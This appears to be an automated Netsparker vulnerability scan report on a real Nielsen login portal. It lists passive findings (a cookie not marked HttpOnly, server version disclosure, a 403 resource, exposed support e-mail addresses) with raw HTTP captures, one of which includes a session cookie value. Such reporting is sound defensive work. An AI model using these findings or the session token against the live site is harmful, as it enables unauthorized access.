border="0" cellspacing="0" cellpadding="0"></table> </div> <div style="border:1px solid #FFFFFF;height:189px;width:380px;margin:auto;background: transparent url('/gateway/images/answers_ui/bg_login.png') no-repeat left top;"> <form class="ni-form" action="/gateway/forms/login.fcc" method="post" name="login_form" AUTOCOMPLETE="ON" styleId="login_form"> <input type="hidden" name="realm" value="06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4"> <input type="hidden" name="target" value="https://answers.nielsen.com/portal/site/answers"> <input type="hidden" name="SMAUTHREASON" value="0"> <input type="hidden" name="password" value=" "> <table class="ni-form-table ni-login-div"> <tr></tr> <tr></tr> <tr> <td class="ni-form-label" style="white-space:nowrap;">Email:</td> <td class="ni-form-label-spacer"> </td> <td class="ni-form-element"><input style="width:210px;" class="ni-form-text-input" id="logon" name="USER" type="text" AUTOCOMPLETE="ON" /></td> </tr> <tr> <td class="ni-form-label" style="white-space:nowrap;">Password:</td> <td class="ni-form-label-spacer"> </td> <td class="ni-form-element"><input style="width:100px;" class="ni-form-text-input" id="temp_password" name="PASSWORD" type="password" AUTOCOMPLETE="ON" /></td> </tr> <tr> <td class="ni-form-label-spacer"> </td> <td> </td> <td style="text-align:right;"> <a href="#" class="ni-btn-link" onMousedown="this.className='ni-btn-link-active';return false;" onMouseout="this.className='ni-btn-link';return false;" onMouseup="this.className='ni-btn-link';return false;" onClick="document.forms.login_form.submit()" ><span class="ni-btn-right-light"><span class="ni-btn-left-light"><span class="ni-btn-body-light">Login</span></span></span></a><input type="submit" value="submit" style="position:absolute;left:-2000px;"/> </td> </tr> </table> </form> </div> <div style="width:380px;margin:auto;"> <ul class="ni-unordered-list ni-uordered-list-chevron" style="width:inhe..
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.
Actions to Take
See the remedy for solution
Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as
XSS Tunnel to bypass HTTPOnly protection.
External References
answers_cookie
Request
GET /gateway/ HTTP/1.1 Referer: https://answers.nielsen.com/gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2fanswers User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: answers.nielsen.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 403 Forbidden Set-Cookie: answers_cookie=R868046967; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT Date: Fri, 29 Apr 2011 17:59:31 GMT Server: Apache Content-Length: 1216 X-Powered-By: Servlet/2.5 JSP/2.1 ACNGPWS: 03 Proxy-Connection: keep-alive P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE" Keep-Alive: timeout=15, max=500 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"><HTML><HEAD><TITLE>Error 403--Forbidden</TITLE><META NAME="GENERATOR" CONTENT="WebLogic Server"></HEAD><BODY bgcolor="white"><FONT FACE=Helvetica><BR CLEAR=all><TABLE border=0 cellspacing=5><TR><TD><BR CLEAR=all><FONT FACE="Helvetica" COLOR="black" SIZE="3"><H2>Error 403--Forbidden</H2></FONT></TD></TR></TABLE><TABLE border=0 width=100% cellpadding=10><TR><TD VALIGN=top WIDTH=100% BGCOLOR=white><FONT FACE="Courier New"><FONT FACE="Helvetica" SIZE="3"><H3>From RFC 2068 <i>Hypertext Transfer Protocol -- HTTP/1.1</i>:</H3></FONT><FONT FACE="Helvetica" SIZE="3"><H4>10.4.4 403 Forbidden</H4></FONT><P><FONT FACE="Courier New">The server understood the request, but is refusing to fulfill it. Authorization will not help and the request SHOULD NOT be repeated. If the request method was not HEAD and the server wishes to make public why the request has not been fulfilled, it SHOULD describe the reason for the refusal in the entity. This status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable.</FONT></P></FONT></TD></TR></TABLE></BODY></HTML>
Java Servlet Version Disclosure
Java Servlet Version Disclosure
Netsparker identified that the target web server is using Java Servlet. This information was gathered from the HTTP Headers.
Impact
An attacker can look for specific security vulnerabilities for the version disclosed by the SERVER header.
Configure your web server to prevent information leakage from the SERVER
header of its HTTP response.
Servlet/2.5
Request
GET /gateway/ HTTP/1.1 Referer: https://answers.nielsen.com/gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2fanswers User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: answers.nielsen.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 403 Forbidden Set-Cookie: answers_cookie=R868046967; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT Date: Fri, 29 Apr 2011 17:59:31 GMT Server: Apache Content-Length: 1216 X-Powered-By: Servlet/2.5 JSP/2.1 ACNGPWS: 03 Proxy-Connection: keep-alive P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE" Keep-Alive: timeout=15, max=500 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"><HTML><HEAD><TITLE>Error 403--Forbidden</TITLE><META NAME="GENERATOR" CONTENT="WebLogic Server"></HEAD><BODY bgcolor="white"><FONT FACE=Helvetica><BR CLEAR=all><TABLE border=0 cellspacing=5><TR><TD><BR CLEAR=all><FONT FACE="Helvetica" COLOR="black" SIZE="3"><H2>Error 403--Forbidden</H2></FONT></TD></TR></TABLE><TABLE border=0 width=100% cellpadding=10><TR><TD VALIGN=top WIDTH=100% BGCOLOR=white><FONT FACE="Courier New"><FONT FACE="Helvetica" SIZE="3"><H3>From RFC 2068 <i>Hypertext Transfer Protocol -- HTTP/1.1</i>:</H3></FONT><FONT FACE="Helvetica" SIZE="3"><H4>10.4.4 403 Forbidden</H4></FONT><P><FONT FACE="Courier New">The server understood the request, but is refusing to fulfill it. Authorization will not help and the request SHOULD NOT be repeated. If the request method was not HEAD and the server wishes to make public why the request has not been fulfilled, it SHOULD describe the reason for the refusal in the entity. This status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable.</FONT></P></FONT></TD></TR></TABLE></BODY></HTML>
Forbidden Resource
Forbidden Resource
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.
Impact
There is no impact resulting from this issue.
Request
GET /gateway/ HTTP/1.1 Referer: https://answers.nielsen.com/gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2fanswers User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: answers.nielsen.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 403 Forbidden Set-Cookie: answers_cookie=R868046967; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT Date: Fri, 29 Apr 2011 17:59:31 GMT Server: Apache Content-Length: 1216 X-Powered-By: Servlet/2.5 JSP/2.1 ACNGPWS: 03 Proxy-Connection: keep-alive P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE" Keep-Alive: timeout=15, max=500 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"><HTML><HEAD><TITLE>Error 403--Forbidden</TITLE><META NAME="GENERATOR" CONTENT="WebLogic Server"></HEAD><BODY bgcolor="white"><FONT FACE=Helvetica><BR CLEAR=all><TABLE border=0 cellspacing=5><TR><TD><BR CLEAR=all><FONT FACE="Helvetica" COLOR="black" SIZE="3"><H2>Error 403--Forbidden</H2></FONT></TD></TR></TABLE><TABLE border=0 width=100% cellpadding=10><TR><TD VALIGN=top WIDTH=100% BGCOLOR=white><FONT FACE="Courier New"><FONT FACE="Helvetica" SIZE="3"><H3>From RFC 2068 <i>Hypertext Transfer Protocol -- HTTP/1.1</i>:</H3></FONT><FONT FACE="Helvetica" SIZE="3"><H4>10.4.4 403 Forbidden</H4></FONT><P><FONT FACE="Courier New">The server understood the request, but is refusing to fulfill it. Authorization will not help and the request SHOULD NOT be repeated. If the request method was not HEAD and the server wishes to make public why the request has not been fulfilled, it SHOULD describe the reason for the refusal in the entity. This status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable.</FONT></P></FONT></TD></TR></TABLE></BODY></HTML>
E-mail Address Disclosure
E-mail Address Disclosure
Netsparker found e-mail addresses on the web site.
Impact
E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .
Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.
External References
- /gateway/support/support.jsp
grbtech@nielsen.com ProdHelpLine@nielsen.com nielsensolutionscentreapac@nielsen.com Technical.Support@nielsen.com EEMEAHelpdesk@nielsen.com solutions.eu@nielsen.com LatAm.HelpDesk@nielsen.com
Request
GET /gateway/support/support.jsp HTTP/1.1 Referer: https://answers.nielsen.com/gateway/logon.htm?TYPE=33619969&REALMOID=06-0008fcbc-145a-1be3-b1b7-05e50a27c0f4&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-N%2fX3w2PnaN8cBlony5gQcMZ%2b2Q9Cxhjqwa3V8AR0lLW5sdY0cl8Av6tvJ0zGxzYJ&TARGET=-SM-https%3a%2f%2fanswers%2enielsen%2ecom%2fportal%2fsite%2fanswers User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: answers.nielsen.com Cookie: answers_cookie=R868046967; GATEWAYSESSION=3pQsN68Ds9pFQn2lswbFflkzpJJRQQp9ZnnRFD2l4TGSvLLHtG4T!-271814052 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Set-Cookie: answers_cookie=R868046967; path=/; expires=Fri, 29-Apr-2011 23:52:34 GMT Date: Fri, 29 Apr 2011 17:59:32 GMT Server: Apache X-Powered-By: Servlet/2.5 JSP/2.1 ACNGPWS: 03 Proxy-Connection: keep-alive P3P: policyref="http://answers.nielsen.com/legal/p3p.xml", CP="CAO DSP COR CURa ADMi DEVi IVAi OUR NOR STP IND PHY ONL UNI COM NAV INT DEM CNT PRE" Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <title>Nielsen Answers</title> <style> body, td { /* SET FONT FOR ALL BROWSERS */ font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } body, tr, .ni-heading1, .ni-heading2, .ni-heading3, .ni-heading4, .ni-definition-list, .ni-ordered-list, .ni-unordered-list, .ni-unordered-list-no-pad, .ni-body-text, .ni-body-text-2, .ni-form-label, .ni-error-text, .ni-footer { text-align: left; color: #7E7E7E; line-height: 1.6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } img { border: none; } .ni-link img, .ni-link .ni-img { border: none; } .ni-link, .ni-link:link, .ni-link:visited { color: #545763; font-weight: bold; text-decoration: none; } .ni-link2, .ni-link2:link, .ni_link2:visited { color: #00A2ED; text-decoration: none; } .ni-active, .ni-active:link, .ni-active:visited { color: #02A2EC } .ni-link:hover, .ni-link2:hover, .ni-active:hover { color: #43BAF1; } .ni-error, .ni-information, .ni-helptext { padding: 9px 9px 0; margin-bottom: 9px; background: white; } .ni-error { border: 1px solid red; color: #c00; } .ni-error-text { color: #c00; margin: 0 0 9px; } .ni-information, .ni-helptext { border: 1px solid #D7D8DC; background-color: #EFF0F2; } .ni-unordered-list, .ni-unordered-list ul, .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { list-style-type: square; font-weight: bold; padding: 0; color: #666; margin: 0 0 9px 19px; } .ni-unordered-list-no-pad, .ni-unordered-list-no-pad ul { margin: 0 0 0px 19px; } .ni-unordered-list ul { margin-bottom: 0; margin-left: 13px; } .ni-unordered-list li { padding: 0px;; } .ni-uordered-list-chevron, .ni-uordered-list-chevron ul { list-style-type: none; margin: 0 0 9px 5px; } .ni-uordered-list-chevron li { background: transparent url("/gateway/images/answers_ui/ni-chevron.gif") no-repeat left 4px; padding-left: 15px; } .ni-uordered-list-chevron ul { margin-left: 0; } .ni-ordered-list, .ni-ordered-list ol { padding-left: 5px; margin: 0 0 9px 19px; } .ni-ordered-list ol { margin-bottom: 0; } .ni-definition-list { margin: 0; } .ni-definition-list dt { font-weight: bold; margin: 0; } .ni-definition-list dd { font-weight: normal; margin: 0; } .ni-heading1 { font-weight: bold; font-size: 20px; display: block; margin: 0 0 9px; line-height: 1.1; } .ni-heading2 { font-size: 16px; font-weight: normal; display: block; margin: 0 0 9px; line-height: 1.3; } .ni-heading3 { font-size: 12px; font-weight: bold; color: #666; display: block; margin: 0; } .ni-heading4 { font-size: 11px; font-weight: bold; color: #000; display: block; margin: 0 0 9px; } .ni-body-text { margin: 0 0 9px; font-weight: normal; } .ni-body-text-2 { margin: 0; font-weight: normal; } .ni-strong { font-weight: bold; } .ni-emphasis { font-weight: normal; font-style: italic; } .ni-heading4 { } .ni-hr { height: 1px; margin: 1.2em 0; background: #333; color: #333; border: 0; clear: both; } .ni-hr-2 { height: 1px; margin: .5em 0; background: #333; color: #333; border: 0; clear: both; } .ni-border-top { border-top: solid 1px #333 } .ni-br { width: 100%; clear: both; } /* Form Elements ---------------------------------------------------------*/ .ni-form { margin: 0; } .ni-form-table { margin: 0; } .ni-form-required { color: #F68421; } .ni-form-label { font-size: 11px; text-align: right; vertical-align: top; } .ni-form-label-t-left { font-size: 11px; text-align: left; vertical-align: middle; } .ni-form-label-v-middle { font-size: 11px; text-align: right; vertical-align: middle; } .ni-form-label-spacer { width: 6px; } .ni-form-element { vertical-align: top; } .ni-form-text-input { border: 1px solid #BDBEC1; background-color: #f5f5f6; padding: 2px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; } .ni-form-text-input:focus { background-color: #ceedfc; } .ni-form-select { border: 1px solid #BDBEC1; background-color: #f5f5f6; font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #333; } .ni-form-checkbox { width: auto; } .ni-form-textarea { padding: 1px 3px; font-family: Arial, Helvetica, sans-serif; font-size: 11px; border: 1px solid #BDBEC1; background-color: #f5f5f6; color: #333; } .ni-form-textarea:focus { background-color: #ceedfc; } .ni-form-file { border: 1px solid #BDBEC1; font-size: 11px; font-family: Arial, Helvetica, sans-serif; } .ni-form-disabled { background-color: #dcdcdc; } /* SIMPLE BUTTONS --------------------------------------------------------*/ .ni-btn { display: inline; width: auto; } .ni-btn input { background: #41BAF2; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#73CCF6',EndColorStr='#02A3ED'); color: white; font-weight: bold; font-size: 11px; border: 1px solid #0071BF; padding-top: 1px; padding-bottom: 1px; } .ni-btn-disabled input { background: #B5E4FA; border: 1px solid #5CC3F3; color: white !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#CFEEFC',EndColorStr='#96DDF9'); } .ni-btn-dark input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } .ni-btn-green input { background: #2594D9; border: 1px solid #0071BF !important; filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=0,StartColorStr='#43A3DD',EndColorStr='#0277D4'); } /* Table Elements --------------------------------------------------------*/ .ni-chrome-head { width:100%; } .ni-table { border: 1px solid black !important; border-collapse: collapse; clear: both; } .ni-row-head, .ni-row-head th { vertical-align: bottom; padding: 2px 7px; border: 1px solid #000; border-right: 1px solid #bebec0; border-left: 1px solid #bebec0; background-color: #eee; font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; } .ni-row-head-link, .ni-row-head-link:link, .ni-row-head-link:visited { font: normal normal bold 12px Arial, Helvetica, sans-serif; color: #000; text-decoration: none; } .ni-row-head-link:hover { color: #43BAF1; } .ni-row-even, .ni-row-even td { background-color: #eee; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-row-odd, .ni-row-odd td { background-color: #fff; font: normal normal normal 11px Arial, Helvetica, sans-serif; } .ni-table-cell { vertical-align: middle; padding: 2px 7px; border: 1px solid #bebec0; color: #000; text-align: center; } table .ni-table-cell-left { text-align: left; } table .ni-table-cell-right { text-align: right; } table .ni-table-cell-center { text-align: center; } .ni-table .ni-link { font-weight: bold; color: #545763; } .ni-table .ni-user { font-weight: normal; } /* standard colored buttons ----------------------------------------------*/ .ni-btn-link, .ni-btn-link-active, .ni-btn-link-disabled { /*position: relative !important;*/ font: 11px arial, helvetica, sans-serif; font-weight: bold; text-decoration: none; line-height: 200%; *line-height: 100% !important; /*patch for ie6 problems*/ *vertical-align: 0px; *padding: 0; /*border: 1px solid green;*/ } /*active state*/ .ni-btn-link:active { background-position: 100% -75px; text-decoration: none; } .ni-btn-link-active { background-position: 100% -75px !important; } .ni-btn-link:active span { background-position: 100% -75px !important; text-decoration: none; } .ni-btn-link-active span { background-position: 100% -75px !important; } .ni-btn-link:active span span { background-position: 0 -75px !important; text-decoration: none; } .ni-btn-link-active span span { background-position: 0 -75px !important; } /*disabled state*/ .ni-btn-link-disabled { cursor:default !important; } .ni-btn-link-disabled { background-position: 100% -50px !important; } .ni-btn-link-disabled span { background-position: 100% -50px !important; } .ni-btn-link-disabled span span { background-position: 0 -50px !important; } /*hover state*/ .ni-btn-link:hover { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span { background-position: 100% -25px; text-decoration: none; } .ni-btn-link:hover span span { background-position: 0 -25px; text-decoration: none; } /* light colored buttons ------------------------*/ .ni-btn-body-light { background: transparent url("/gateway/images/buttons/ni-btn-bg2.gif"); background-repeat: repeat-x; background-position: left top; padding: 3px 0px 5px 0px; height: 20px !important; display:inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-light { background-position: left -50px; } .ni-btn-left-light { background: transparent url("/gateway/images/buttons/ni-btn-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; cursor: hand; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-light { padding: 3px 0px 5px 5px; background-position: left -50px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-right-light { background: transparent url("/gateway/images/buttons/ni-btn-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; cursor: hand; *zoom: 1; /*hack for ie problems*/ *padding: 0px 5px 0px 0px !important; } .ni-btn-link-disabled .ni-btn-right-light { padding: 3px 5px 5px 0; background-position: right -50px; *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } /* dark colored buttons -------------------------*/ .ni-btn-body-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg2.gif") repeat-x left top; padding: 3px 0px 5px 0px; height: 20px !important; display: inline; color: #fff; cursor: hand; *padding: 0px 0px 0px 0px !important; /*patch for ie problems*/ *line-height: 1.8; *vertical-align: 3px; *display: inline-block; } .ni-btn-link-disabled .ni-btn-body-dark { background-position: left -50px; } .ni-btn-left-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-bg1.gif") no-repeat left top; padding: 3px 0px 5px 5px; height: 20px; *padding: 0 0 0 5px !important; /*patch for ie problems*/ } .ni-btn-link-disabled .ni-btn-left-dark { background-position: left -50px; } .ni-btn-right-dark { background: transparent url("/gateway/images/buttons/ni-btn-or-onblue-bg3.gif") no-repeat right top; padding: 3px 5px 5px 0; height: 20px; *zoom: 1; /*hack for ie problems*/ *padding: 0 5px 0 0 !important; /*hack for ie problems*/ } .ni-btn-link-disabled .ni-btn-right-dark { background-position: right -50px; } .ni-btn-left-cancel { background: url(/gateway/images/buttons/ni-btn-cancel-onblue.gif) no-repeat left top; padding: 3px 0px 5px 21px; *padding: 0px 0px 0px 21px !important; /*hack for ie problems*/ } /* These blocks are for displaying buttons -------------------------------*/ .white { padding: 20px 0; margin: 10px; background: #fff; border: 1px solid #999; overflow: hidden; } .blue { padding: 20px 0; margin: 10px; background: #A4DEF9; border: 1px solid #999; overflow: hidden; } /* Added new styles to display error messages in the Login page*/ .ni-logon-success-text { color: #009900 !important } .ni-logon-message-text { color: #0000ff !important } .ni-logon-body-text { color: #000000 !important } .ni-logon-error-text { color: #ff0000 !important } </style> <script language="JavaScript"> <!-- hide //------------------------------------------// //------------------------------------------// //--- United States Support Info --// //------------------------------------------// function openUSSupportInfo() { USSupport= open("", "displayWindow","width=450,height=270,resizable=no,fullscreen=no,copyhistory=no,directories=no,location=no,status=no,toolbar=no,menubar=no"); // open document for further output USSupport.document.open(); // create document USSupport.document.write('<html><head><title>'); USSupport.document.write('</title></head><body>'); USSupport.document.write('<LINK REL="stylesheet" TYPE="text/css" HREF="/gateway/style/ni-style.jsp" TITLE="ni-css">') USSupport.document.write('<table cellpadding="0" cellspacing="0" style="border-style: none;" height="51px" width="450" border="0">'); USSupport.document.write('<tr >'); USSupport.document.write('<td align="left" style="border-bottom: 1px solid #CCCCCC"><img alt="Nielsen Site logo" src="/gateway/images/answers_ui/acnimage.jpg" hspace="0" vspace="0" border="0"></td>'); USSupport.document.write('<td style="border-bottom: 1px solid #CCCCCC"> </td>'); USSupport.document.write('<td align="right" style="border-bottom: 1px solid #CCCCCC"></td>'); USSupport.document.write('</tr>'); USSupport.document.write('</table>'); USSupport.document.write('<table width="400" border="0" cellpadding="0">'); USSupport.document.write('<tr>'); USSupport.document.write('<td></td>'); USSupport.document.write('</tr>'); USSupport.document.write('<tr>'); USSupport.document.write('<td class="ni-heading2"><b>Nielsen Answers Support - United States</b></td>'); USSupport.document.write('</tr>'); USSupport.document.write('<tr>'); USSupport.document.write('<td></br></td>'); USSupport.document.write('</tr>'); USSupport.document.write('<tr>'); USSupport.document.write('<td class="ni-heading3">Email <span class="ni-link"><A href="mailto:grbtech@nielsen.com">grbtech@nielsen.com</A></span></td>'); USSupport.document.write('</tr>'); USSupport.document.write('<td></br></td>'); USSupport.document.write('<tr>'); USSupport.document.write('<td class="ni-heading3">Tel: +1 800 395 4226</td>'); USSupport.document.write('</tr>'); USSupport.document.write('<tr>'); USSupport.document.write('<td height="50" valign="bottom" class="ni-panel-mid"><a href="#" onMouseup="'); USSupport.document.write("className='ni-btn-link'"); USSupport.document.write(';return false;" onMouseout="this.className='); USSupport.document.write("'ni-btn-link';"); USSupport.document.write('return false;" onMousedown="this.className='); USSupport.document.write("'ni-btn-link-active';"); USSupport.document.write('return false;" onClick="window.close()" class="ni-btn-link"><span class="ni-btn-right-light" id="N10005-right"><span class="ni-btn-left-light" id="N10005-left"><span class="ni-btn-body-light" id="N10005-text">Close</span></span></span></a></td>'); USSupport.document.write('</tr>'); USSupport.document.write('</table>'); USSupport.document.write('</body></html>'); USSup..